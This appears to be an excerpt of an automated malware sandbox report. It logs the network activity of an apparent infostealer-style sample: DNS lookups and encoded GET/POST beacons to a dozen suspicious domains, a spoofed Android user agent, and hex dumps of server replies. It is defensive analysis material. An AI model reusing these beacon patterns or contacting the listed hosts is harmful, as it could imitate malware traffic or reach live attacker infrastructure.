            Source: global trafficHTTP traffic detected: GET /l4rw/?cLqL3H=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&rZwP=sHyxifGPIFN HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t3gh/?cLqL3H=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&rZwP=sHyxifGPIFN HTTP/1.1Host: www.fontanerourgente.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zctj/?cLqL3H=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&rZwP=sHyxifGPIFN HTTP/1.1Host: www.onlytradez.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kyiu/?rZwP=sHyxifGPIFN&cLqL3H=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI= HTTP/1.1Host: www.32wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f9bc/?cLqL3H=6SLGUfBvDKizOJgilDQKzMcZwSFGn/Vi7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPB6ub3CJra4TZEe7JWrBxAEyCa2afTuvzmz4GABagNobpZHqRWtM=&rZwP=sHyxifGPIFN HTTP/1.1Host: www.jaxo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= HTTP/1.1Host: www.xforum.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l90v/?cLqL3H=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&rZwP=sHyxifGPIFN HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rgqx/?cLqL3H=k7UoFTYShwNh8X33bnwY0thhVqNwwmygtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXpJ/xTrqx42/2gBD027lgSoPVoYuqVtYfG9QcRyu7q583xH9wJHc=&rZwP=sHyxifGPIFN HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: global trafficDNS traffic detected: DNS query: www.anaidittrich.com
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 211Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Raw: 63 4c 71 4c 33 48 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 69 47 68 4a 53 4e 72 53 36 6b 49 6d 7a 30 76 65 48 56 30 36 2f 46 6b 51 35 62 32 37 73 66 34 66 41 62 42 6d 34 71 53 4c 47 35 4d Data Ascii: cLqL3H=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkiGhJSNrS6kImz0veHV06/FkQ5b27sf4fAbBm4qSLG5M
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:07:56 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:08:12 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:08:14 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:08:17 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:08:19 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:08:25 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:08:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:08:30 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 